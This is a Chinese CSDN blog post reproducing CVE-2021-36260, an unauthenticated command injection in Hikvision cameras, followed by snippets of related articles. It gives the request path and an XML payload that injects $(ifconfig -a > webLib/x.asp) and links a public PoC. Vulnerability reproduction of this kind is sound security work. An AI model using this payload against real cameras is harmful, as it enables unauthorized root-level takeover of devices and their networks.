海康威视摄像头命令注入 CVE-2021-36260

冬6325

已于 2023-05-23 18:31:20 修改

阅读量2.2k

点赞数 2

分类专栏：漏洞复现文章标签：安全

于 2023-05-23 18:22:10 首次发布

本文链接：https://blog.csdn.net/qq_14902381/article/details/130832841

版权

漏洞复现专栏收录该内容

4 篇文章

订阅专栏

记录工作中发现的问题

此漏洞无需账号密码就可以利用

先访问ip:port//SDK/webLanguage ，用burpsuite抓包

修改url 为 /x，

#payload：
<?xml version='1.0'encoding='UTF-8'?>
  <language>
     $(ifconfig -a > webLib/x.asp)
  </language>

也可以用poc：CVE-2021-36260/CVE-2021-36260.py at main · Aiminsun/CVE-2021-36260 · GitHub

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

冬6325

关注关注

2
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【漏洞复现】Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)

晚风不及你

01-20

5845

Hikvision（海康威视）是一家在中国颇具影响力的安防公司，其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富，涵盖了各种型号和功能，以满足不同用户的需求。

海康威视hikOS系统常用命令

热门推荐

剁椒鱼头没剁椒的博客

01-06

3万+

攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备，即使设备的所有者受限于有限的受保护 shell（psh）。除了入侵 IP 摄像头外，还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互，攻击者只需要访问 http 或 HTTPS 服务器端口（80/443）即可利用该漏洞，无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。

海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)

菜鸟学渗透

10-08

2886

海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)

HIKVISION海康威视代码执行漏洞复现(CVE-2021-36260)

红队是青春

01-27

7280

CVE-2021-36260，海康威视代码执行漏洞复现

hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip

05-20

标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视（Hikvision）设备相关的安全漏洞，具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南，用于解析...

CVE-2017-7921海康威视配置文件解码(configfile解码)

12-11

具体影响产品型号，请参考CVE-2017-7921；CVE-2017-7922漏洞详情。该程序发布，意在警醒相关单位及时更新相关设备，网络安全需要大家共同监督。(ps:工具不会使用可以私信我，直接差评的一律自理)

关于 海康威视 摄像头的整理-附件资源

03-05

关于 海康威视 摄像头的整理-附件资源

hikvision_CVE-2017-7921配置文件解密.rar

05-20

具体影响产品型号，请参考CVE-2017-7921；CVE-2017-7922漏洞详情。该程序发布，意在警醒相关单位及时更新相关设备，网络安全需要大家共同监督。本程序需和配置文件存放在同一目录下运行exe即可配置文件名...

推荐文章：海康威视CVE-2021-36260 RCE漏洞利用工具

gitblog_00088的博客

06-20

1451

打点--海康威视命令执行 CVE-2021-36260

weixin_51559599的博客

10-30

469

链接: https://pan.baidu.com/s/1KoV2cifZHnmwSaXfmSnPXw?pwd=u364 提取码: u364。

海康linux 命令,海康摄像机命令行

weixin_35397235的博客

04-30

3321

BusyBox v1.2.1 Protect Shell (psh) ver: MT-1494accessDvrSwitchatclearExcepcloseIRISdbgGuidebugCmddebugDspdebugLogdecStatdialPowerCtrldisableHBdisableWatchdogdmesgdspStatusenable3GOSDenableHBenableWatc...

探索安全边界：Hikvision摄像机远程命令注入漏洞利用工具深度解析

gitblog_00070的博客

05-29

859

探索安全边界：Hikvision摄像机远程命令注入漏洞利用工具深度解析去发现同类优质开源项目:https://gitcode.com/ 项目简介随着网络摄像头在监控领域的广泛应用，其安全性成为不可忽视的重要环节。CVE-2021-36260是一个针对特定型号Hikvision网络摄像机的命令注入漏洞示例。本开源项目由bashis贡献，提供了PoC代码，演示了如何通过未充分验证的输入，在指定版本...

提权：CVE-2021-3560

守拙的博客

07-12

1211

CVE-2021-3560 一、漏洞名称： Linux Polkit权限提升漏洞二、漏洞编号： CVE-2021-3560 三、漏洞描述：由于linux的polkit组件错误处理了异常情况，导致权限提升。该漏洞能够使普通用户获取到root权限。四、影响版本：目前已知的版本情况。五、漏洞分析当一个命令被发送到目标程序处理时，消息发送方会被分配一个唯一总线名称（感觉有点像sessionid的意思）。当需要polkit去做权限校验时，polkit会通过唯一总线名称去查询命令发送方的U

海康威视越权访问CVE-2021-7921漏洞复现

归零者的博客

10-31

1万+

海康威视越权访问CVE-2021-7921漏洞复现

cve-2021-36260 复现

08-19

CVE-2021-36260 是一个软件安全漏洞，它可能导致恶意攻击者在受影响的系统上执行任意代码。要复现这个漏洞，需要按照以下步骤进行操作： 1. 确认受影响的软件版本：首先要确定系统中运行的软件版本是否受到 CVE-2021-36260 的影响。可以通过查阅相关厂商的安全公告或者漏洞报告来确认软件版本，请务必确保系统是运行了受影响版本的软件。 2. 查找已公开的漏洞利用代码：可以通过漏洞数据库或专门的安全网站查找已公开的漏洞利用代码。这些代码通常是由安全研究人员编写的，用于测试和验证漏洞的存在。找到适用于 CVE-2021-36260 的利用代码。 3. 构建实验环境：在一个控制良好的实验环境中复现漏洞是非常重要的，以避免对真实系统造成损害。可以使用虚拟机软件，如VirtualBox或VMware，在一台隔离的计算机上构建一个与目标环境相似的实验环境。 4. 执行漏洞利用代码：在实验环境中，将漏洞利用代码运行在目标软件上。这个利用代码可能会利用软件中的漏洞，攻击相关的漏洞点，以实现执行恶意代码的目的。 5. 验证结果：在执行漏洞利用代码后，需要验证攻击是否成功，即是否能够执行恶意代码。可以通过检查系统日志、查看文件变化、尝试获取系统管理员权限等方式来验证攻击结果。需要注意的是，复现漏洞是为了测试和验证安全漏洞的存在，并非为了进行非法的攻击行为。在进行复现之前，应获得合法授权并遵守相关法律法规。